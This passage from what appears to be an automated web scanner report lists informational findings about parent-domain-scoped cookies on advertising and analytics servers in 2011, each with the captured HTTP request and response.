HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(Hg0)m)_Uh2u:[r@PdBuy]S=FdY*FXw(hO!$dY(koMBFV95dEhO@gS%S=?Gc6U#?^ITW.C%.HqhKFPS0R:Ol/][9xsNXM?#=popAjMJ!=!P'kjdtE#agd`VY]hTg'7jxCPQLa-IWtYkK56-6Rj<>QtuQMu]Fli*-A:DG1t]9*q=ZNiI'q#a$$?('BmwWkq5M+gDc$AkjBcFpf.^Km7HkC6E*s*W!hVTSm=VV<zcaLjQ#u^1u!hUCx)6f1NpiP^1'?YjrnLNx0X+hS.)S$dNhv^T14kCT98KUh_Mm2P`S>yQhx3G-Rt#$gkLo]g)HuNl?T7v:=$P9r<oMjHGZ?fL9-L4qV?C[kwp-eJtVF#peHsxA-xhGAPY@nTUG3*pBV[T@@xw68=86_wVWO9'0NB.S=4gt<_3sB/bm8)W^6FLt^)4EgEJ/n!hdKiPI?u]%e5$Lu3[D]fwa%'PFavH5F)k4ZOPiuvV>cQWQorFp=v5%adk(P$^d0xFLswEkQxCTdbg4S$7QP#j1V6Zc+KDDhon2h0OFfImh+#oLE(br@zr_m-M%^o6v$@kezl*!N3zot*`H_R!Crp3O+$wmeHb:f=swYD<R*X1j7U1HH64sb>8f09y:8/XSP-Lk*'#mnr*d(+ZL4q_tb%p8LE0px*?qu^KY>qH>0:w9Q8K?zQK*Z1FYq4so09Y?yx#wwNwyrk6Ak; path=/; expires=Wed, 10-Aug-2011 13:33:34 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:34 GMT

GIF89a.............!.......,........@..L..;
8.14. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/tr/10759-119438-1104-0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/tr/10759-119438-1104-0?mpt=2011.05.12.13.27.52 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10759:1104/15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Sun, 12-May-2013 5:04:07 GMT; path=/; domain=.mediaplex.com;
Content-Type: image/gif
Content-Length: 49
Date: Thu, 12 May 2011 13:28:13 GMT

GIF89a...................!.......,...........T..;
8.15. http://analytics.apnewsregistry.com/analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.apnewsregistry.com
Path:   /analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/v2/image.svc/ECP/MAI/ecp_271515_2011-05-12T000000-0500/RWS/www.courierpress.com/PC/Basic/ HTTP/1.1
Host: analytics.apnewsregistry.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uciv1=4e974cc2-0d47-4e41-93f4-be0dc63e9ba6

Response

HTTP/1.1 303 See Other
Cache-Control: private
Date: Thu, 12 May 2011 13:31:25 GMT
Location: http://d503lhn9b3612.cloudfront.net/pixel.gif
P3P: CP="NOI PSAo OUR IND COM NAV STA"
Server: Microsoft-IIS/7.0
Set-Cookie: uciv1=4e974cc2-0d47-4e41-93f4-be0dc63e9ba6; domain=apnewsregistry.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive

8.16. http://analytics.apnewsregistry.com/analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.apnewsregistry.com
Path:   /analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/v2/image.svc/woc_lyons/RWS/www.mysuburbanlife.com/CAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/CVI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd705-11-2011-0500CDT/MAI/ef6205cd-3e6f-4bf4-8165-c2986dc63fd7/E/prod/PC/Basic/AT/A HTTP/1.1
Host: analytics.apnewsregistry.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uciv1=4e974cc2-0d47-4e41-93f4-be0dc63e9ba6

Response

HTTP/1.1 303 See Other
Cache-Control: private
Date: Thu, 12 May 2011 13:30:34 GMT
Location: http://d503lhn9b3612.cloudfront.net/pixel.gif
P3P: CP="NOI PSAo OUR IND COM NAV STA"
Server: Microsoft-IIS/7.0
Set-Cookie: uciv1=4e974cc2-0d47-4e41-93f4-be0dc63e9ba6; domain=apnewsregistry.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Connection: keep-alive

8.17. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1305206896.017,wait-%3E10000,&1305206897376 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_G=method->-1,ts->1305206896; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
8.18. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=207615189 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:33:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=51&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 12 13:33:28 2011&prad=253735207&arc=207615189&; expires=Wed 10-Aug-2011 13:33:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25904

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"207615189",Location:
...[SNIP]...
8.19. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:16 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206896; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25837

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
8.20. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=121744&u=http%3A%2F%2Fwww.greenfieldreporter.com%2Fview%2Fstory%2F0a19804652d4473789a5eda53a1ed37f%2FUS-Investing-Unlucky-Seven%2F&a=2&id=63715474&p=10&v=2&inif=0&l=44&t=129&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMJ2=AAJzHU2y+SIB; CMD3=AAFJfU3EWdoAAda-AAMwuwECAA**; CMS=98198&-1&115183&1305033095; CMD1=AADz3E3JOYcAAcHvAANYqQEBAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006; CMD2=AAFKkU3IB7EAAduQAAM1pAEBAAABPrtNyAexAAHbkAAC9aIEBAAAATk1TcgHsAAB25AAAwS1AQIAAAFNgk3IB7EAAduQAANH4QcHAAABSf1NyAewAAHbkAADWe4BAQAAAUoDTcgHsAAB25AAA1qaAQEAAAE5fk3JOggAAdd3AALYWAEBAAABTC1NyAhhAAHbkAADQI4FBQAAASyQTcgHsQAB25AAAsYoAQEAAAEuSE3IB7EAAduQAALcQgMDAAABLhhNyAexAAHbkAAC-PAHBwAAAUrTTcgHsQAB25AAA2MUBgYA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Thu, 12 May 2011 13:31:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 13:31:48 GMT
Content-Length: 178
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Fri, 11 May 2012 13:31:48 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:31:48 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:31:48 GMT
Set-Cookie: CMST=Tcvg+U3L4UQE;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:31:48 GMT
Set-Cookie: CMSC=TcvhRA**;domain=casalemedia.com;path=/;
Set-Cookie: CMDD=AAHbkAIAAWdIAQABpAcB;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:31:48 GMT
Set-Cookie: CMD2=AAE5NU3L4UQAAduQAAMEtQIEAA**;domain=casalemedia.com;path=/;expires=Sat, 11 Jun 2011 13:31:48 GMT

document.write('<iframe src="http://cdn.optmd.com/V2/80181/197813/index.html" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');
8.21. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=114014&u=http%3A%2F%2Fcdn-bpx.a9.com%2Famzn%2Fiframe.html&a=4&id=81951206&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn-bpx.a9.com/amzn/iframe.html?p=281;last=1094;r=a834682
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMJ2=AAJzHU2y+SIB; CMD3=AAFJfU3EWdoAAda-AAMwuwECAA**; CMSC=Tcvg+Q**; CMD2=AAE5NU3L4PkAAduQAAMEtQEDAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006; CMS=107527&1305207085&98198&-1; CMST=Tcvg+U3L4S0C; CMDD=AAGkBwEAAduQAQ**; CMD1=AADz3E3L4S0AAaQHAAMfUwECAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Thu, 12 May 2011 13:33:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:47 GMT
Content-Length: 252
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Fri, 11 May 2012 13:33:47 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:47 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:47 GMT
Set-Cookie: CMST=Tcvg+U3L4bsD;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:47 GMT
Set-Cookie: CMDD=AAFnSAIAAaQHAQAB25ABfad4e1a9f1208c3c0784AAAAf10*;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:47 GMT
Set-Cookie: CMD4=AAFKA03L4UAAAb1eAANamQEBAAABJ6tNy+G7AAG9XgADNYEBAQA*;domain=casalemedia.com;path=/;expires=Sat, 11 Jun 2011 13:33:47 GMT

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286382387/direct;wi.300;hi.250/01/0797372340?click=http://c.casalemedia.com/c/4/1/75691/" width="300" height="250" marginwidth="0" marginhe
...[SNIP]...
8.22. http://as.casalemedia.com/s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /s

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s?s=107527&u=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&f=1&id=4136036944.972018 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMJ2=AAJzHU2y+SIB; CMD3=AAFJfU3EWdoAAda-AAMwuwECAA**; CMS=98198&-1&115183&1305033095; CMD1=AADz3E3JOYcAAcHvAANYqQEBAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006; CMST=Tcvg+U3L4PkB; CMSC=Tcvg+Q**; CMDD=AAHbkAE*; CMD2=AAE5NU3L4PkAAduQAAMEtQEDAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 0
Content-Type: text/plain
Expires: Thu, 12 May 2011 13:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:26 GMT
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Fri, 11 May 2012 13:33:26 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:26 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:26 GMT
Set-Cookie: CMST=Tcvg+U3L4aYC;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:26 GMT
Set-Cookie: CMDD=AAGkBwIAAduQAQABZ0gB;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:26 GMT

8.23. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
